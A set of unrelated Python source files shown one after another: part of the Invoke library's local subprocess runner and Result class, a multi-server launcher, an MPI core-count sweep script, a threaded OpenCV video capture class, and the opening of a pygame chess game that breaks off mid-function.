"""
Write encoded ``data`` to the running process' stdin.
:param data: A Unicode string.
:returns: ``None``.
"""
# Encode always, then request implementing subclass to perform the
# actual write to subprocess' stdin.
self._write_proc_stdin(data.encode(self.encoding))
def decode(self, data):
"""
Decode some ``data`` bytes, returning Unicode.
"""
# NOTE: yes, this is a 1-liner. The point is to make it much harder to
# forget to use 'replace' when decoding :)
return data.decode(self.encoding, 'replace')
@property
def process_is_finished(self):
"""
Determine whether our subprocess has terminated.
.. note::
The implementation of this method should be nonblocking, as it is
used within a query/poll loop.
:returns:
``True`` if the subprocess has finished running, ``False``
otherwise.
"""
raise NotImplementedError
def start(self, command, shell, env):
"""
Initiate execution of ``command`` (via ``shell``, with ``env``).
Typically this means use of a forked subprocess or requesting start of
execution on a remote system.
In most cases, this method will also set subclass-specific member
variables used in other methods such as `wait` and/or `returncode`.
"""
raise NotImplementedError
def read_proc_stdout(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stdout stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def read_proc_stderr(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stderr stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def _write_proc_stdin(self, data):
"""
Write ``data`` to running process' stdin.
This should never be called directly; it's for subclasses to implement.
See `write_proc_stdin` for the public API call.
:param data: Already-encoded byte data suitable for writing.
:returns: ``None``.
"""
raise NotImplementedError
def default_encoding(self):
"""
Return a string naming the expected encoding of subprocess streams.
This return value should be suitable for use by encode/decode methods.
"""
# TODO: probably wants to be 2 methods, one for local and one for
# subprocess. For now, good enough to assume both are the same.
#
# Based on some experiments there is an issue with
# `locale.getpreferredencoding(do_setlocale=False)` in Python 2.x on
# Linux and OS X, and `locale.getpreferredencoding(do_setlocale=True)`
# triggers some global state changes. (See #274 for discussion.)
encoding = locale.getpreferredencoding(False)
if six.PY2 and not WINDOWS:
default = locale.getdefaultlocale()[1]
if default is not None:
encoding = default
return encoding
def send_interrupt(self, interrupt):
"""
Submit an interrupt signal to the running subprocess.
In almost all implementations, the default behavior is what will be
desired: submit ``\x03`` to the subprocess' stdin pipe. However, we
leave this as a public method in case this default needs to be
augmented or replaced.
:param interrupt:
The locally-sourced ``KeyboardInterrupt`` causing the method call.
:returns: ``None``.
"""
self.write_proc_stdin(u'\x03')
def returncode(self):
"""
Return the numeric return/exit code resulting from command execution.
:returns: `int`
"""
raise NotImplementedError
def stop(self):
"""
Perform final cleanup, if necessary.
This method is called within a ``finally`` clause inside the main `run`
method. Depending on the subclass, it may be a no-op, or it may do
things such as close network connections or open files.
:returns: ``None``
"""
raise NotImplementedError
class Local(Runner):
"""
Execute a command on the local system in a subprocess.
.. note::
When Invoke itself is executed without a controlling terminal (e.g.
when ``sys.stdin`` lacks a useful ``fileno``), it's not possible to
present a handle on our PTY to local subprocesses. In such situations,
`Local` will fall back to behaving as if ``pty=False`` (on the theory
that degraded execution is better than none at all) as well as printing
a warning to stderr.
To disable this behavior, say ``fallback=False``.
"""
def __init__(self, context):
super(Local, self).__init__(context)
# Bookkeeping var for pty use case
self.status = None
def should_use_pty(self, pty=False, fallback=True):
use_pty = False
if pty:
use_pty = True
# TODO: pass in & test in_stream, not sys.stdin
if not has_fileno(sys.stdin) and fallback:
if not self.warned_about_pty_fallback:
sys.stderr.write("WARNING: stdin has no fileno; falling back to non-pty execution!\n") # noqa
self.warned_about_pty_fallback = True
use_pty = False
return use_pty
def read_proc_stdout(self, num_bytes):
# Obtain useful read-some-bytes function
if self.using_pty:
# Need to handle spurious OSErrors on some Linux platforms.
try:
data = os.read(self.parent_fd, num_bytes)
except OSError as e:
# Only eat this specific OSError so we don't hide others
if "Input/output error" not in str(e):
raise
# The bad OSErrors happen after all expected output has
# appeared, so we return a falsey value, which triggers the
# "end of output" logic in code using reader functions.
data = None
else:
data = os.read(self.process.stdout.fileno(), num_bytes)
return data
def read_proc_stderr(self, num_bytes):
# NOTE: when using a pty, this will never be called.
# TODO: do we ever get those OSErrors on stderr? Feels like we could?
return os.read(self.process.stderr.fileno(), num_bytes)
def _write_proc_stdin(self, data):
# NOTE: parent_fd from pty.fork() is a read/write pipe attached to our
# forked process' stdout/stdin, respectively.
fd = self.parent_fd if self.using_pty else self.process.stdin.fileno()
# Try to write, ignoring broken pipes if encountered (implies child
# process exited before the process piping stdin to us finished;
# there's nothing we can do about that!)
try:
return os.write(fd, data)
except OSError as e:
if 'Broken pipe' not in str(e):
raise
def start(self, command, shell, env):
if self.using_pty:
if pty is None: # Encountered ImportError
sys.exit("You indicated pty=True, but your platform doesn't support the 'pty' module!") # noqa
cols, rows = pty_size()
self.pid, self.parent_fd = pty.fork()
# If we're the child process, load up the actual command in a
# shell, just as subprocess does; this replaces our process - whose
# pipes are all hooked up to the PTY - with the "real" one.
if self.pid == 0:
# TODO: both pty.spawn() and pexpect.spawn() do a lot of
# setup/teardown involving tty.setraw, getrlimit, signal.
# Ostensibly we'll want some of that eventually, but if
# possible write tests - integration-level if necessary -
# before adding it!
#
# Set pty window size based on what our own controlling
# terminal's window size appears to be.
# TODO: make subroutine?
winsize = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCSWINSZ, winsize)
# Use execve for bare-minimum "exec w/ variable # args + env"
# behavior. No need for the 'p' (use PATH to find executable)
# for now.
# TODO: see if subprocess is using equivalent of execvp...
os.execve(shell, [shell, '-c', command], env)
else:
self.process = Popen(
command,
shell=True,
executable=shell,
env=env,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
@property
def process_is_finished(self):
if self.using_pty:
# NOTE:
# https://github.com/pexpect/ptyprocess/blob/4058faa05e2940662ab6da1330aa0586c6f9cd9c/ptyprocess/ptyprocess.py#L680-L687
# implies that Linux "requires" use of the blocking, non-WNOHANG
# version of this call. Our testing doesn't verify this, however,
# so...
# NOTE: It does appear to be totally blocking on Windows, so our
# issue #351 may be totally unsolvable there. Unclear.
pid_val, self.status = os.waitpid(self.pid, os.WNOHANG)
return pid_val != 0
else:
return self.process.poll() is not None
def returncode(self):
if self.using_pty:
# No subprocess.returncode available; use WIFEXITED/WIFSIGNALED to
# determine which of WEXITSTATUS / WTERMSIG to use.
# TODO: is it safe to just say "call all WEXITSTATUS/WTERMSIG and
# return whichever one of them is nondefault"? Probably not?
# NOTE: doing this in an arbitrary order should be safe since only
# one of the WIF* methods ought to ever return True.
code = None
if os.WIFEXITED(self.status):
code = os.WEXITSTATUS(self.status)
elif os.WIFSIGNALED(self.status):
code = os.WTERMSIG(self.status)
# Match subprocess.returncode by turning signals into negative
# 'exit code' integers.
code = -1 * code
return code
# TODO: do we care about WIFSTOPPED? Maybe someday?
else:
return self.process.returncode
def stop(self):
# No explicit close-out required (so far).
pass
class Result(object):
"""
A container for information about the result of a command execution.
All params are exposed as attributes of the same name and type.
:param str stdout:
The subprocess' standard output.
:param str stderr:
Same as ``stdout`` but containing standard error (unless the process
was invoked via a pty, in which case it will be empty; see
`.Runner.run`.)
:param str command:
The command which was executed.
:param str shell:
The shell binary used for execution.
:param dict env:
The shell environment used for execution. (Default is the empty dict,
``{}``, not ``None`` as displayed in the signature.)
:param int exited:
An integer representing the subprocess' exit/return code.
:param bool pty:
A boolean describing whether the subprocess was invoked with a pty or
not; see `.Runner.run`.
:param tuple hide:
A tuple of stream names (none, one or both of ``('stdout', 'stderr')``)
which were hidden from the user when the generating command executed;
this is a normalized value derived from the ``hide`` parameter of
`.Runner.run`.
For example, ``run('command', hide='stdout')`` will yield a `Result`
where ``result.hide == ('stdout',)``; ``hide=True`` or ``hide='both'``
results in ``result.hide == ('stdout', 'stderr')``; and ``hide=False``
(the default) generates ``result.hide == ()`` (the empty tuple.)
.. note::
`Result` objects' truth evaluation is equivalent to their `.ok`
attribute's value. Therefore, quick-and-dirty expressions like the
following are possible::
if run("some shell command"):
do_something()
else:
handle_problem()
However, remember `Zen of Python #2
<http://zen-of-python.info/explicit-is-better-than-implicit.html#2>`_.
"""
# TODO: inherit from namedtuple instead? heh (or: use attrs from pypi)
def __init__(
self,
stdout="",
stderr="",
command="",
shell="",
env=None,
exited=0,
pty=False,
hide=tuple(),
):
self.stdout = stdout
self.stderr = stderr
self.command = command
self.shell = shell
self.env = {} if env is None else env
self.exited = exited
self.pty = pty
self.hide = hide
@property
def return_code(self):
"""
An alias for ``.exited``.
"""
return self.exited
def __nonzero__(self):
# NOTE: This is the method that (under Python 2) determines Boolean
# behavior for objects.
return self.ok
def __bool__(self):
# NOTE: And this is the Python 3 equivalent of __nonzero__. Much better
# name...
return self.__nonzero__()
def __str__(self):
if self.exited is not None:
desc = "Command exited with status {0}.".format(self.exited)
else:
desc = "Command was not fully executed due to watcher error."
ret = [desc]
for x in ('stdout', 'stderr'):
val = getattr(self, x)
ret.append(u"""=== {0} ===
{1}
""".format(x, val.rstrip()) if val else u"(no {0})".format(x))
return u"\n".join(ret)
def __repr__(self):
# TODO: more? e.g. len of stdout/err? (how to represent cleanly in a
# 'x=y' format like this? e.g. '4b' is ambiguous as to what it
# represents)
template = "<Result cmd={0!r} exited={1}>"
return template.format(self.command, self.exited)
@property
def ok(self):
"""
A boolean equivalent to ``exited == 0``.
"""
return self.exited == 0
@property
def failed(self):
"""
The inverse of ``ok``.
I.e., ``True`` if the program exited with a nonzero return code, and
``False`` otherwise.
"""
return not self.ok
def normalize_hide(val):
hide_vals = (None, False, 'out', 'stdout', 'err', 'stderr', 'both', True)
if val not in hide_vals:
err = "'hide' got {0!r} which is not in {1!r}"
raise ValueError(err.format(val, hide_vals))
if val in (None, False):
hide = ()
elif val in ('both', True):
hide = ('stdout', 'stderr')
elif val == 'out':
hide = ('stdout',)
elif val == 'err':
hide = ('stderr',)
else:
hide = (val,)
return hide
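# Normalization examples (derived directly from the branches above):
#   normalize_hide(None)  -> ()
#   normalize_hide('out') -> ('stdout',)
#   normalize_hide('err') -> ('stderr',)
#   normalize_hide(True)  -> ('stdout', 'stderr')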
|
start_multiple_servers.py
|
#!/bin/python3.6
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 Robert Gustafsson
# Copyright (c) 2018 Andreas Lindhé
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import configparser
from multiprocessing import Process
import server
cfgfile = sys.argv[1]
config = configparser.ConfigParser()
config.read(cfgfile)
for node in config['Nodes']:
ip, port = config['Nodes'][node].split(':')
Process(target=server.main, args=[ip, port, cfgfile]).start()
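# Illustrative config layout expected by the loop above (the [Nodes] section
# name comes from the code; the node names and addresses are examples):
#
#   [Nodes]
#   node0 = 127.0.0.1:5000
#   node1 = 127.0.0.1:5001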
|
fiber_sweep_cores.py
|
import subprocess
import multiprocessing
from functools import partial
def run(
key: str = "fiber_xposition",
value: float = 0,
ncores: int = 6,
):
command = f"mpirun -np {ncores} python fiber.py --{key}={value}"
print(command)
subprocess.call(command, shell=True)
run_fiber_xposition = partial(run, key="fiber_xposition")
run_fiber_angle_deg = partial(run, key="fiber_angle_deg")
if __name__ == "__main__":
ncores_sweep = [1, 2, 4, 8, 16]
p = multiprocessing.Pool(multiprocessing.cpu_count())
p.starmap(run, [("ncores", ncores) for ncores in ncores_sweep])
# p.starmap(run_fiber_angle_deg, ncores=[1, 2, 4, 8, 16])
# p.starmap(run_fiber_angle_deg, fiber_angle_deg=range(10, 30, 5))
# for fiber_xposition in range(-5, 6):
# p = multiprocessing.Process(target=run, args=(fiber_xposition=fiber_xposition))
# p.start()
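# Hedged sketch: a fiber_xposition sweep using the same pool pattern as the
# ncores sweep above (the position range is illustrative):
#
#     p.starmap(run, [("fiber_xposition", x) for x in range(-5, 6)])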
|
video_thread.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 22 20:00:06 2021
Original idea and code:
https://www.youtube.com/watch?v=sW4CVI51jDY
Clayton Darwin
https://gitlab.com/duder1966/youtube-projects/-/tree/master/
@author: mherrera
"""
import time
import threading
import queue
import cv2
import numpy as np
# ------------------------------
# Camera Thread
# ------------------------------
class VideoThread:
def __init__(self,
video_source=0, # device, stream or file
video_width=640,
video_height=480,
video_frame_rate=10,
buffer_all=False,
video_fourcc=cv2.VideoWriter_fourcc(*"MJPG"),
try_to_reconnect=False):
self.video_source = video_source
self.video_width = video_width
self.video_height = video_height
self.video_frame_rate = video_frame_rate
self.video_fourcc = video_fourcc
self.buffer_all = buffer_all
self.try_to_reconnect = try_to_reconnect
# ------------------------------
# System Variables
# ------------------------------
# buffer setup
self.buffer_length = 5
# control states
self.frame_grab_run = False
self.frame_grab_on = False
# counts and amounts
self.frame_count = 0
self.frames_returned = 0
self.current_frame_rate = 0.0
self.loop_start_time = 0
self.last_try_reconnection_time = 0
# buffer
if self.buffer_all:
self.buffer = queue.Queue(self.buffer_length)
else:
# last frame only
self.buffer = queue.Queue(1)
self.finished = False
# camera setup
self.video_init_wait_time = 0.5
self.resource = cv2.VideoCapture(self.video_source)
self.resource.set(cv2.CAP_PROP_FRAME_WIDTH, self.video_width)
self.resource.set(cv2.CAP_PROP_FRAME_HEIGHT, self.video_height)
self.resource.set(cv2.CAP_PROP_FPS, self.video_frame_rate)
self.resource.set(cv2.CAP_PROP_FOURCC, self.video_fourcc)
time.sleep(self.video_init_wait_time)
if not self.resource.isOpened():
self.resource_available = False
else:
self.resource_available = True
# get the actual cam configuration
self.video_width = int(self.resource.get(cv2.CAP_PROP_FRAME_WIDTH))
self.video_height = int(self.resource.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.video_frame_rate = self.resource.get(cv2.CAP_PROP_FPS)
self.video_fourcc = self.resource.get(cv2.CAP_PROP_FOURCC)
# black frame (filler)
self.black_frame = np.zeros((
self.video_height, self.video_width, 3), np.uint8)
def get_curr_config_fps(self):
return self.video_frame_rate
def get_curr_config_width(self):
return self.video_width
def get_curr_config_height(self):
return self.video_height
def get_curr_frame_number(self):
return self.frame_count
def reconnect(self):
self.stop()
self.__init__(
buffer_all=self.buffer_all,
video_source=self.video_source,
video_width=self.video_width,
video_height=self.video_height,
video_frame_rate=self.video_frame_rate,
video_fourcc=self.video_fourcc,
try_to_reconnect=self.try_to_reconnect
)
self.start()
print('reconnecting...')
def is_available(self):
return self.resource_available
def start(self):
# set run state
self.frame_grab_run = True
# start thread
self.thread = threading.Thread(target=self.loop)
self.thread.start()
def stop(self):
#print('########## stop')
# set loop kill state
self.frame_grab_run = False
# let loop stop
while self.frame_grab_on:
time.sleep(0.1)
# stop camera if not already stopped
if self.resource:
try:
self.resource.release()
except Exception:
pass
self.resource = None
self.resource_available = False
# drop buffer
self.buffer = None
# reset reconnection timer
self.last_try_reconnection_time = 0
def loop(self):
# load start frame
frame = self.black_frame
if not self.buffer.full():
self.buffer.put(frame, False)
# status
self.frame_grab_on = True
self.loop_start_time = time.time()
# frame rate
local_loop_frame_counter = 0
local_loop_start_time = time.time()
while self.resource.grab():
# external shut down
if not self.frame_grab_run:
break
# true buffered mode (for files, no loss)
if self.buffer_all:
# buffer is full, pause and loop
if self.buffer.full():
time.sleep(1/self.video_frame_rate)
# or load buffer with next frame
else:
grabbed, frame = self.resource.retrieve()
# grabbed, frame = self.resource.read()
if not grabbed:
break
self.buffer.put(frame, False)
self.frame_count += 1
local_loop_frame_counter += 1
# false buffered mode (for camera, loss allowed)
else:
grabbed, frame = self.resource.retrieve()
# grabbed, frame = self.resource.read()
if not grabbed:
break
# open a spot in the buffer
if self.buffer.full():
self.buffer.get()
self.buffer.put(frame, False)
self.frame_count += 1
local_loop_frame_counter += 1
# update frame read rate
if local_loop_frame_counter >= 10:
self.current_frame_rate = \
round(local_loop_frame_counter/
(time.time()-local_loop_start_time), 2)
local_loop_frame_counter = 0
local_loop_start_time = time.time()
# shut down
self.loop_start_time = 0
self.frame_grab_on = False
self.resource_available = False
# self.stop()
def next(self, black=True, wait=0):
# black frame default
if black:
frame = self.black_frame.copy()
# no frame default
else:
frame = None
# # can't open camera by index, lost connection, or EOF
# if not self.is_available():
# print('not available:{}'.format(self.video_source))
if not self.finished:
# if self.is_available():
# print('########## self.buffer.qsize():{}'.format(self.buffer.qsize()))
# print('########## self.buffer.empty():{}'.format(self.buffer.empty()))
if self.is_available() or not self.buffer.empty():
try:
#print('\t########## self.buffer.qsize():{}'.format(self.buffer.qsize()))
frame = self.buffer.get(timeout=wait)
self.frames_returned += 1
except queue.Empty:
# print('Queue Empty!')
# print(traceback.format_exc())
pass
# elif not self.buffer.empty():
# print('\t@@@@@@@@@@@@@@@@@ self.is_available() and self.buffer.empty()')
elif self.try_to_reconnect:
if self.last_try_reconnection_time == 0:
self.last_try_reconnection_time = time.time()
else:
if time.time() - self.last_try_reconnection_time >= 10.0:
self.reconnect()
if self.is_available():
self.last_try_reconnection_time = 0
else:
self.last_try_reconnection_time = time.time()
else:
#print('\t########## STOP: self.buffer.qsize():{}'.format(self.buffer.qsize()))
self.finished = True
#self.stop()
#print('\n')
return self.finished, frame
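# Hedged usage sketch (device index, window name and quit key are examples):
#
#     vt = VideoThread(video_source=0)
#     vt.start()
#     try:
#         while True:
#             done, frame = vt.next(wait=1)
#             if done:
#                 break
#             cv2.imshow('preview', frame)
#             if cv2.waitKey(1) & 0xFF == ord('q'):
#                 break
#     finally:
#         vt.stop()
#         cv2.destroyAllWindows()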
|
Chess-v0.8-threading.py
|
import multiprocessing
import threading
import pygame
from pygame.locals import *
import os
import os.path
import random
import time
from tkinter import Tk
import math
from copy import deepcopy
class Board():
def __init__(self):
self.dark_square = pygame.image.load(os.path.join("textures/dark_square.png")).convert_alpha()
self.dark_square = pygame.transform.scale(self.dark_square, (startup.tile_size, startup.tile_size))
self.dark_square_rect = self.dark_square.get_rect()
self.light_square = pygame.image.load(os.path.join("textures/light_square.png")).convert_alpha()
self.light_square = pygame.transform.scale(self.light_square, (startup.tile_size, startup.tile_size))
self.light_square_rect = self.light_square.get_rect()
def draw_board(self):
for i in range(0, 8):
x = startup.tile_size * i
for j in range(0, 8):
y = startup.tile_size * j
if (i + j) % 2 == 0:
self.light_square_rect.x = x
self.light_square_rect.y = y
tile = self.light_square, self.light_square_rect
else:
self.dark_square_rect.x = x
self.dark_square_rect.y = y
tile = self.dark_square, self.dark_square_rect
startup.screen.blit(tile[0], tile[1])
class Pieces():
def __init__(self):
#[xpos, ypos, alive, unmoved]
self.white_pawns_inf = [[0, 1, True, True], [1, 1, True, True], [2, 1, True, True], [3, 1, True, True], [4, 1, True, True], [5, 1, True, True], [6, 1, True, True], [7, 1, True, True]]
self.white_bishops_inf = [[2, 0, True], [5, 0, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.white_knights_inf = [[1, 0, True], [6, 0, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.white_rooks_inf = [[0, 0, True, True], [7, 0, True, True], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
self.white_queens_inf = [[3, 0, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.white_king_inf = [[4, 0, True, True]]
self.black_pawns_inf = [[0, 6, True, True], [1, 6, True, True], [2, 6, True, True], [3, 6, True, True], [4, 6, True, True], [5, 6, True, True], [6, 6, True, True], [7, 6, True, True]]
self.black_bishops_inf = [[2, 7, True], [5, 7, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.black_knights_inf = [[6, 7, True], [1, 7, True], [6, 3, False], [0, 3, False], [2, 0, False], [2, 6, False], [6, 2, False], [0, 2, False], [0, 7, False], [0, 7, False]]
self.black_rooks_inf = [[0, 7, True, True], [7, 7, True, True], [2, 0, False, False], [4, 6, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
self.black_queens_inf = [[3, 7, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.black_king_inf = [[4, 7, True, True]]
self.piece_value_matrix = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
self.white_pawn_img = pygame.image.load(os.path.join("textures/white_pawn.png")).convert_alpha()
self.white_pawn_img = pygame.transform.scale(self.white_pawn_img, (startup.tile_size, startup.tile_size))
self.white_pawn_img_rect = self.white_pawn_img.get_rect()
self.white_knight_img = pygame.image.load(os.path.join("textures/white_knight.png")).convert_alpha()
self.white_knight_img = pygame.transform.scale(self.white_knight_img, (startup.tile_size, startup.tile_size))
self.white_knight_img_rect = self.white_knight_img.get_rect()
self.white_bishop_img = pygame.image.load(os.path.join("textures/white_bishop.png")).convert_alpha()
self.white_bishop_img = pygame.transform.scale(self.white_bishop_img, (startup.tile_size, startup.tile_size))
self.white_bishop_img_rect = self.white_bishop_img.get_rect()
self.white_rook_img = pygame.image.load(os.path.join("textures/white_rook.png")).convert_alpha()
self.white_rook_img = pygame.transform.scale(self.white_rook_img, (startup.tile_size, startup.tile_size))
self.white_rook_img_rect = self.white_rook_img.get_rect()
self.white_queen_img = pygame.image.load(os.path.join("textures/white_queen.png")).convert_alpha()
self.white_queen_img = pygame.transform.scale(self.white_queen_img, (startup.tile_size, startup.tile_size))
self.white_queen_img_rect = self.white_queen_img.get_rect()
self.white_king_img = pygame.image.load(os.path.join("textures/white_king.png")).convert_alpha()
self.white_king_img = pygame.transform.scale(self.white_king_img, (startup.tile_size, startup.tile_size))
self.white_king_img_rect = self.white_king_img.get_rect()
self.black_pawn_img = pygame.image.load(os.path.join("textures/black_pawn.png")).convert_alpha()
self.black_pawn_img = pygame.transform.scale(self.black_pawn_img, (startup.tile_size, startup.tile_size))
self.black_pawn_img_rect = self.black_pawn_img.get_rect()
self.black_knight_img = pygame.image.load(os.path.join("textures/black_knight.png")).convert_alpha()
self.black_knight_img = pygame.transform.scale(self.black_knight_img, (startup.tile_size, startup.tile_size))
self.black_knight_img_rect = self.black_knight_img.get_rect()
self.black_bishop_img = pygame.image.load(os.path.join("textures/black_bishop.png")).convert_alpha()
self.black_bishop_img = pygame.transform.scale(self.black_bishop_img, (startup.tile_size, startup.tile_size))
self.black_bishop_img_rect = self.black_bishop_img.get_rect()
self.black_rook_img = pygame.image.load(os.path.join("textures/black_rook.png")).convert_alpha()
self.black_rook_img = pygame.transform.scale(self.black_rook_img, (startup.tile_size, startup.tile_size))
self.black_rook_img_rect = self.black_rook_img.get_rect()
self.black_queen_img = pygame.image.load(os.path.join("textures/black_queen.png")).convert_alpha()
self.black_queen_img = pygame.transform.scale(self.black_queen_img, (startup.tile_size, startup.tile_size))
self.black_queen_img_rect = self.black_queen_img.get_rect()
self.black_king_img = pygame.image.load(os.path.join("textures/black_king.png")).convert_alpha()
self.black_king_img = pygame.transform.scale(self.black_king_img, (startup.tile_size, startup.tile_size))
self.black_king_img_rect = self.black_king_img.get_rect()
self.white_occupation_x = [0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7]
self.white_occupation_y = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1]
self.black_occupation_x = [0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7]
self.black_occupation_y = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1]
self.en_passant_x_y = [8, 8]
self.half_moves = 0
self.turn_num = 1
def draw_pieces_white(self):
#print("called")
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.white_pawn_img_rect.x = self.white_pawns_inf[i][0] * startup.tile_size
self.white_pawn_img_rect.y = self.white_pawns_inf[i][1] * startup.tile_size
self.white_pawn_img_rect.y = self.white_pawn_img_rect.y - (self.white_pawn_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_pawn_img, self.white_pawn_img_rect)
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.white_bishop_img_rect.x = self.white_bishops_inf[i][0] * startup.tile_size
self.white_bishop_img_rect.y = self.white_bishops_inf[i][1] * startup.tile_size
self.white_bishop_img_rect.y = self.white_bishop_img_rect.y - (self.white_bishop_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_bishop_img, self.white_bishop_img_rect)
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.white_knight_img_rect.x = self.white_knights_inf[i][0] * startup.tile_size
self.white_knight_img_rect.y = self.white_knights_inf[i][1] * startup.tile_size
self.white_knight_img_rect.y = self.white_knight_img_rect.y - (self.white_knight_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_knight_img, self.white_knight_img_rect)
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.white_rook_img_rect.x = self.white_rooks_inf[i][0] * startup.tile_size
self.white_rook_img_rect.y = self.white_rooks_inf[i][1] * startup.tile_size
self.white_rook_img_rect.y = self.white_rook_img_rect.y - (self.white_rook_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_rook_img, self.white_rook_img_rect)
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.white_queen_img_rect.x = self.white_queens_inf[i][0] * startup.tile_size
self.white_queen_img_rect.y = self.white_queens_inf[i][1] * startup.tile_size
self.white_queen_img_rect.y = self.white_queen_img_rect.y - (self.white_queen_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_queen_img, self.white_queen_img_rect)
if self.white_king_inf[0][2] == True:
self.white_king_img_rect.x = self.white_king_inf[0][0] * startup.tile_size
self.white_king_img_rect.y = self.white_king_inf[0][1] * startup.tile_size
self.white_king_img_rect.y = self.white_king_img_rect.y - (self.white_king_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_king_img, self.white_king_img_rect)
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.black_pawn_img_rect.x = self.black_pawns_inf[i][0] * startup.tile_size
self.black_pawn_img_rect.y = self.black_pawns_inf[i][1] * startup.tile_size
self.black_pawn_img_rect.y = self.black_pawn_img_rect.y - (self.black_pawn_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_pawn_img, self.black_pawn_img_rect)
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.black_bishop_img_rect.x = self.black_bishops_inf[i][0] * startup.tile_size
self.black_bishop_img_rect.y = self.black_bishops_inf[i][1] * startup.tile_size
self.black_bishop_img_rect.y = self.black_bishop_img_rect.y - (self.black_bishop_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_bishop_img, self.black_bishop_img_rect)
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.black_knight_img_rect.x = self.black_knights_inf[i][0] * startup.tile_size
self.black_knight_img_rect.y = self.black_knights_inf[i][1] * startup.tile_size
self.black_knight_img_rect.y = self.black_knight_img_rect.y - (self.black_knight_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_knight_img, self.black_knight_img_rect)
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.black_rook_img_rect.x = self.black_rooks_inf[i][0] * startup.tile_size
self.black_rook_img_rect.y = self.black_rooks_inf[i][1] * startup.tile_size
self.black_rook_img_rect.y = self.black_rook_img_rect.y - (self.black_rook_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_rook_img, self.black_rook_img_rect)
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.black_queen_img_rect.x = self.black_queens_inf[i][0] * startup.tile_size
self.black_queen_img_rect.y = self.black_queens_inf[i][1] * startup.tile_size
self.black_queen_img_rect.y = self.black_queen_img_rect.y - (self.black_queen_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_queen_img, self.black_queen_img_rect)
if self.black_king_inf[0][2] == True:
self.black_king_img_rect.x = self.black_king_inf[0][0] * startup.tile_size
self.black_king_img_rect.y = self.black_king_inf[0][1] * startup.tile_size
